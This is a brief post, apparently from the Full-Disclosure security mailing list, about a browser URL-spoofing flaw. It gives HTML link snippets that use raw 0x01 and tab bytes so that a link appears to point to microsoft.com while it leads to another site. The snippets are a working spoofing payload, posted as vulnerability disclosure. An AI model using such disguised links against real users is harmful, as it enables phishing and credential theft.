> https://paypal.com Although I did notice that the <button> seems to be a > requirement for this vulnerability to work, as using a plain hyperlink > <a href> fails for me.
I managed it to get working by using raw 0x01 character in url: <a href='http://www.microsoft.com 0x01 @other_site> Of course, you must use hex editor to insert the 0x01. Some other interesting effects can be achieved with: <a href='http://www.microsoft.com 0x09 0x09 0x09 0x09 0x09 0x09 0x01 0x01 .. many more 0x01's .. 0x01 @other_site Regards, -- Jarkko Turkulainen <[EMAIL PROTECTED]> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
